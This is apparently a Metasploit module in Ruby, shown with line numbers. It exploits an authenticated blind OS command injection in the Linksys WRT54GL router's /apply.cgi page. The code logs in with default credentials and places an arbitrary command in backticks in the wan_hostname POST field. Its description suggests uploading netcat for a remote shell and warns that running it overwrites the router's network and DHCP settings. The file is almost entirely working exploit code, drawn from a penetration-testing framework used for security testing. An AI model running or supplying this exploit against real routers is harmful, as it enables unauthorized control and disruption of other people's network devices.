Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Linksys WRT54GL Remote Command Execution',
14
        'Description' => %q{
15
          Some Linksys Routers are vulnerable to OS Command injection.
16
          You will need credentials to the web interface to access the vulnerable part
17
          of the application.
18
          Default credentials are always a good starting point. admin/admin or admin
19
          and blank password could be a first try.
20
          Note: This is a blind OS command injection vulnerability. This means that
21
          you will not see any output of your command. Try a ping command to your
22
          local system and observe the packets with tcpdump (or equivalent) for a first test.
23

24
          Hint: To get a remote shell you could upload a netcat binary and exec it.
25
          WARNING: this module will overwrite network and DHCP configuration.
26
        },
27
        'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
28
        'License' => MSF_LICENSE,
29
        'References' => [
30
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
31
          [ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
32
          [ 'EDB', '24202' ],
33
          [ 'BID', '57459' ],
34
          [ 'OSVDB', '89421' ]
35
        ],
36
        'DisclosureDate' => '2013-01-18'
37
      )
38
    )
39

40
    register_options(
41
      [
42
        Opt::RPORT(80),
43
        OptString.new('TARGETURI', [ true, 'PATH to OS Command Injection', '/apply.cgi']),
44
        OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),
45
        OptString.new('HttpPassword', [ false, 'Password to login with', 'password']),
46
        OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']),
47
        OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']),
48
        OptAddress.new('LANIP', [ false, 'LAN IP address of the router (default is RHOST)']),
49
        OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']),
50
        OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']),
51
        OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500'])
52
      ]
53
    )
54
  end
55

56
  # If the user configured LANIP, use it. Otherwise, use RHOST.
57
  # NB: This presumes a dotted quad ip address.
58
  def lan_ip
59
    if datastore['LANIP'].to_s.empty?
60
      datastore['RHOST']
61
    else
62
      datastore['LANIP']
63
    end
64
  end
65

66
  def run
67
    # setting up some basic variables
68
    uri = datastore['TARGETURI']
69
    user = datastore['HttpUsername']
70
    rhost = datastore['RHOST']
71
    netmask = datastore['NETMASK']
72
    routername = datastore['ROUTER_NAME']
73
    wandomain = datastore['WAN_DOMAIN']
74
    wanmtu = datastore['WAN_MTU']
75

76
    ip = lan_ip.split('.')
77

78
    if datastore['HttpPassword'].nil?
79
      pass = ''
80
    else
81
      pass = datastore['HttpPassword']
82
    end
83

84
    print_status("Trying to login with #{user} / #{pass}")
85

86
    begin
87
      res = send_request_cgi({
88
        'uri'	=> uri,
89
        'method' => 'GET',
90
        'authorization' => basic_auth(user, pass)
91
      })
92

93
      unless (res.is_a? Rex::Proto::Http::Response)
94
        vprint_error("#{rhost} not responding")
95
        return :abort
96
      end
97

98
      if (res.code == 404)
99
        print_error('Not Found page returned')
100
        return :abort
101
      end
102

103
      if [200, 301, 302].include?(res.code)
104
        print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
105
      else
106
        print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'")
107
        return :abort
108
      end
109
    rescue ::Rex::ConnectionError
110
      vprint_error("#{rhost} - Failed to connect to the web server")
111
      return :abort
112
    end
113

114
    cmd = datastore['CMD']
115

116
    print_status('Sending remote command: ' + cmd)
117

118
    # cmd = Rex::Text.uri_encode(datastore['CMD'])
119
    # original Post Request:
120
    # data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&"
121
    # data_cmd << "lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&"
122
    # data_cmd << "wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&"
123
    # data_cmd << "lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&"
124
    # data_cmd << "lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&"
125
    # data_cmd << "wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&"
126
    # data_cmd << "wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&"
127
    # data_cmd << "wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1"
128

129
    vprint_status("using the following target URL: #{uri}")
130

131
    begin
132
      res = send_request_cgi({
133
        'uri'	=> uri,
134
        'method' => 'POST',
135
        'authorization' => basic_auth(user, pass),
136
        # 'data' => data_cmd,
137

138
        'vars_post' => {
139
          'submit_button' => 'index',
140
          'change_action' => '1',
141
          'submit_type' => '1',
142
          'action' => 'Apply',
143
          'now_proto' => 'dhcp',
144
          'daylight_time' => '1',
145
          'lan_ipaddr' => '4',
146
          'wait_time' => '0',
147
          'need_reboot' => '0',
148
          'ui_language' => 'de',
149
          'wan_proto' => 'dhcp',
150
          'router_name' => routername.to_s,
151
          'wan_hostname' => "`#{cmd}`",
152
          'wan_domain' => wandomain.to_s,
153
          'mtu_enable' => '1',
154
          'wan_mtu' => wanmtu.to_s,
155
          'lan_ipaddr_0' => (ip[0]).to_s,
156
          'lan_ipaddr_1' => (ip[1]).to_s,
157
          'lan_ipaddr_2' => (ip[2]).to_s,
158
          'lan_ipaddr_3' => (ip[3]).to_s,
159
          'lan_netmask' => netmask.to_s,
160
          'lan_proto' => 'dhcp',
161
          'dhcp_check' => '1',
162
          'dhcp_start' => '100',
163
          'dhcp_num' => '50',
164
          'dhcp_lease' => '0',
165
          'wan_dns' => '4',
166
          'wan_dns0_0' => '0',
167
          'wan_dns0_1' => '0',
168
          'wan_dns0_2' => '0',
169
          'wan_dns0_3' => '0',
170
          'wan_dns1_0' => '0',
171
          'wan_dns1_1' => '0',
172
          'wan_dns1_2' => '0',
173
          'wan_dns1_3' => '0',
174
          'wan_dns2_0' => '0',
175
          'wan_dns2_1' => '0',
176
          'wan_dns2_2' => '0',
177
          'wan_dns2_3' => '0',
178
          'wan_wins' => '4',
179
          'wan_wins_0' => '0',
180
          'wan_wins_1' => '0',
181
          'wan_wins_2' => '0',
182
          'wan_wins_3' => '0',
183
          'time_zone' => '-08+1+1',
184
          '_daylight_time' => '1'
185
        }
186
      })
187
    rescue ::Rex::ConnectionError
188
      vprint_error("#{rhost} - Failed to connect to the web server")
189
      return :abort
190
    end
191

192
    if res && (res.code == 200)
193
      print_status('Blind Exploitation - Response expected')
194
    else
195
      print_error("Blind Exploitation - Response don't expected")
196
    end
197
    print_status('Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed')
198
    print_status('Blind Exploitation - unknown Exploitation state')
199
  end
200
end
201

202